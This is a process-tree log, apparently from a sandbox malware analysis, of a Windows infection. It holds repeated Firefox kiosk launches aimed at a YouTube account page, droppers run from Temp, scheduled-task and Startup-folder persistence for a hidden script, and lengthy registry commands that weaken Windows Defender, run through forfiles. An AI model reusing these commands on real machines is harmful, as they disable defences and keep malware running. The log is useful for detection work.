C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3672.2.1430128334\1993680539" -childID 1 -isForBrowser -prefsHandle 2832 -prefMapHandle 2468 -prefsLen 22257 -prefMapSize 233578 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec35c313-5f3d-4e97-aeab-def30ea5f26d} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" 2888 1e3247fba58 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3672.3.1587270622\462644390" -childID 2 -isForBrowser -prefsHandle 3432 -prefMapHandle 3424 -prefsLen 26605 -prefMapSize 233578 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {c33eb905-e3c1-4b8f-8d5d-16f1f0a12897} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" 3504 1e3259b3558 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3672.4.527843490\1838868917" -childID 3 -isForBrowser -prefsHandle 4060 -prefMapHandle 4056 -prefsLen 26681 -prefMapSize 233578 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {4404f0f4-6947-408b-a877-4024cf1286cf} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" 4068 1e326f31558 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3672.5.246742088\929718591" -childID 4 -isForBrowser -prefsHandle 4448 -prefMapHandle 4444 -prefsLen 26605 -prefMapSize 233578 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02103f92-b06c-46c5-a720-d01996b42cf7} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" 4456 1e3287d7258 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3672.6.358327931\562756106" -childID 5 -isForBrowser -prefsHandle 4600 -prefMapHandle 4604 -prefsLen 26605 -prefMapSize 233578 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8564dcb8-0686-4941-89f3-0aaa562ccfb9} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" 4588 1e3287d9f58 tab6⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3672.7.147602741\1952093124" -childID 6 -isForBrowser -prefsHandle 4784 -prefMapHandle 4788 -prefsLen 26605 -prefMapSize 233578 -jsInitHandle 868 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2f69ce9b-72e7-4ab0-8942-a38be29aced4} 3672 "\\.\pipe\gecko-crash-server-pipe.3672" 4776 1e328c4a258 tab6⤵
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account5⤵
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account5⤵
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5832.0.1399414796\1461935803" -parentBuildID 20221007134813 -prefsHandle 1596 -prefMapHandle 1600 -prefsLen 21477 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {03298ab4-44f0-4149-b9d9-9b4372085b37} 5832 "\\.\pipe\gecko-crash-server-pipe.5832" 1680 1616a2ca958 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5832.1.1667445327\1666423855" -parentBuildID 20221007134813 -prefsHandle 2084 -prefMapHandle 2080 -prefsLen 22338 -prefMapSize 233666 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ece03b81-8973-4054-82e8-fbb3dc33c39d} 5832 "\\.\pipe\gecko-crash-server-pipe.5832" 2112 16169df2258 socket5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5832.2.886392796\899335533" -childID 1 -isForBrowser -prefsHandle 2660 -prefMapHandle 2656 -prefsLen 22441 -prefMapSize 233666 -jsInitHandle 1176 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {02001f2b-548f-477c-bc16-ecedf5304fdc} 5832 "\\.\pipe\gecko-crash-server-pipe.5832" 2672 1616da30758 tab5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5832.3.778813372\1233260343" -childID 2 -isForBrowser -prefsHandle 3480 -prefMapHandle 3476 -prefsLen 26789 -prefMapSize 233666 -jsInitHandle 1176 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {effdc866-4675-46bc-b144-75f1f195aaa2} 5832 "\\.\pipe\gecko-crash-server-pipe.5832" 3488 1615fe66b58 tab5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5832.4.803943161\431442837" -childID 3 -isForBrowser -prefsHandle 3960 -prefMapHandle 3956 -prefsLen 26817 -prefMapSize 233666 -jsInitHandle 1176 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5f0b423-e40b-45f1-86b1-8d18d31c8506} 5832 "\\.\pipe\gecko-crash-server-pipe.5832" 3640 1615fe63858 tab5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5832.5.817176769\8295960" -parentBuildID 20221007134813 -prefsHandle 1680 -prefMapHandle 2876 -prefsLen 26817 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a2835e39-cf8c-4c0a-a262-eb0999e671b3} 5832 "\\.\pipe\gecko-crash-server-pipe.5832" 2424 1615fe66b58 gpu5⤵
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6104.0.735968701\1547975274" -parentBuildID 20221007134813 -prefsHandle 1588 -prefMapHandle 1568 -prefsLen 21597 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {07206412-ac1f-4aff-9444-7e68918f13fa} 6104 "\\.\pipe\gecko-crash-server-pipe.6104" 1680 27039df6758 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6104.1.729651555\1893715643" -parentBuildID 20221007134813 -prefsHandle 2080 -prefMapHandle 2076 -prefsLen 22458 -prefMapSize 233666 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f29b69d2-da51-462c-a390-3b8da47ca4db} 6104 "\\.\pipe\gecko-crash-server-pipe.6104" 2108 270392f2158 socket5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6104.2.485943345\588089890" -childID 1 -isForBrowser -prefsHandle 2568 -prefMapHandle 2584 -prefsLen 22561 -prefMapSize 233666 -jsInitHandle 1192 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {638349aa-8ca2-4869-b9c3-6d99a5b53a8c} 6104 "\\.\pipe\gecko-crash-server-pipe.6104" 2560 2703dce0258 tab5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6104.3.971205464\294687007" -childID 2 -isForBrowser -prefsHandle 3432 -prefMapHandle 1008 -prefsLen 26817 -prefMapSize 233666 -jsInitHandle 1192 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {548d07c8-0343-4b67-a293-2e5bd5c34718} 6104 "\\.\pipe\gecko-crash-server-pipe.6104" 3436 2703eca0558 tab5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6104.4.1332090020\567469986" -childID 3 -isForBrowser -prefsHandle 3324 -prefMapHandle 3632 -prefsLen 26817 -prefMapSize 233666 -jsInitHandle 1192 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0e3f6cd-34e7-4097-828a-9dc4fa12f3f9} 6104 "\\.\pipe\gecko-crash-server-pipe.6104" 3432 27040932f58 tab5⤵
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3736.0.991273099\185205991" -parentBuildID 20221007134813 -prefsHandle 1356 -prefMapHandle 1348 -prefsLen 21597 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b0f78edf-cac5-449c-ae6b-a49e9ea14873} 3736 "\\.\pipe\gecko-crash-server-pipe.3736" 1440 139d85ddb58 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="720.0.1327215633\375615091" -parentBuildID 20221007134813 -prefsHandle 2112 -prefMapHandle 2104 -prefsLen 21597 -prefMapSize 233706 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {42820e3a-b19f-477f-aa66-854bb72b43b1} 720 "\\.\pipe\gecko-crash-server-pipe.720" 2184 129aebe7858 socket6⤵
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.0.1916270035\1041437109" -parentBuildID 20221007134813 -prefsHandle 1616 -prefMapHandle 1608 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9b04627d-863c-4901-bcbf-4efd7c5d470b} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1696 26d14ed7458 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2840.1.1957373109\354323992" -parentBuildID 20221007134813 -prefsHandle 1896 -prefMapHandle 1892 -prefsLen 17601 -prefMapSize 230321 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {4ca2214a-afee-4879-9499-8a5abf17e09c} 2840 "\\.\pipe\gecko-crash-server-pipe.2840" 1908 26d15344a58 socket5⤵
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3140.0.1530049208\949643063" -parentBuildID 20221007134813 -prefsHandle 1356 -prefMapHandle 1344 -prefsLen 21597 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {3267d0ae-04d3-4a36-93b9-b6cc49dab88e} 3140 "\\.\pipe\gecko-crash-server-pipe.3140" 1444 222cd2dae58 gpu5⤵
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5332.0.1724165783\1705999151" -parentBuildID 20221007134813 -prefsHandle 1348 -prefMapHandle 1336 -prefsLen 21597 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {77507f83-1107-43d5-87f0-fe05589be187} 5332 "\\.\pipe\gecko-crash-server-pipe.5332" 1452 12a2a5d3558 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="1720.0.1151981204\20663622" -parentBuildID 20221007134813 -prefsHandle 1360 -prefMapHandle 1348 -prefsLen 21597 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {8c9a735c-3d7e-460b-a4fb-c170ab22c964} 1720 "\\.\pipe\gecko-crash-server-pipe.1720" 1456 2557dad1158 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5568.0.1032682990\1543101359" -parentBuildID 20221007134813 -prefsHandle 2092 -prefMapHandle 2084 -prefsLen 21597 -prefMapSize 233706 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e83a76c1-7801-4078-9e0d-4c3ffd36e98e} 5568 "\\.\pipe\gecko-crash-server-pipe.5568" 2164 28f27debb58 socket6⤵
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6028.0.884122454\120605106" -parentBuildID 20221007134813 -prefsHandle 1404 -prefMapHandle 1396 -prefsLen 21597 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {53d5b5cd-9cb6-4c38-bbff-32f008bea080} 6028 "\\.\pipe\gecko-crash-server-pipe.6028" 1484 1e2b37eeb58 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="6088.0.297235627\1630140983" -parentBuildID 20221007134813 -prefsHandle 1916 -prefMapHandle 1908 -prefsLen 17556 -prefMapSize 230321 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d174ba67-83c9-480e-9383-93c504907182} 6088 "\\.\pipe\gecko-crash-server-pipe.6088" 2012 21dc22c2458 socket6⤵
-
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5004.0.759170324\1494384177" -parentBuildID 20221007134813 -prefsHandle 1652 -prefMapHandle 1640 -prefsLen 17556 -prefMapSize 230321 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f13058ac-5fdf-460c-9bc6-5ed9e279f546} 5004 "\\.\pipe\gecko-crash-server-pipe.5004" 1724 24e8c5d8058 gpu5⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5004.1.766700107\1780084248" -parentBuildID 20221007134813 -prefsHandle 1892 -prefMapHandle 1888 -prefsLen 17601 -prefMapSize 230321 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {0562a7b4-9a31-4e5d-b2cc-d3e0cf4a7fe2} 5004 "\\.\pipe\gecko-crash-server-pipe.5004" 1904 24e8c443058 socket5⤵
-
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://www.youtube.com/account4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3708.0.438712679\680033859" -parentBuildID 20221007134813 -prefsHandle 1368 -prefMapHandle 1360 -prefsLen 21606 -prefMapSize 233666 -appDir "C:\Program Files\Mozilla Firefox\browser" - {971833cd-2bae-4ade-8e61-d5195daaf1a9} 3708 "\\.\pipe\gecko-crash-server-pipe.3708" 1480 18b9a6e7d58 gpu5⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"C:\Users\Admin\AppData\Local\Temp\1000310001\shopfree.exe"3⤵
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeC:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\054fdc5f70\Hkbsse.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F1⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Tuition" /tr "wscript //B 'C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js'" /sc minute /mo 5 /F2⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & echo URL="C:\Users\Admin\AppData\Local\QuantumDynamics Lab\QuantumFlow.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\QuantumFlow.url" & exit1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS63B6.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zS63B6.tmp\Install.exe PV /MUDxdidmbUZ 385121 /S1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
-
-
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
- Indirect Command Execution
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
-
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
-
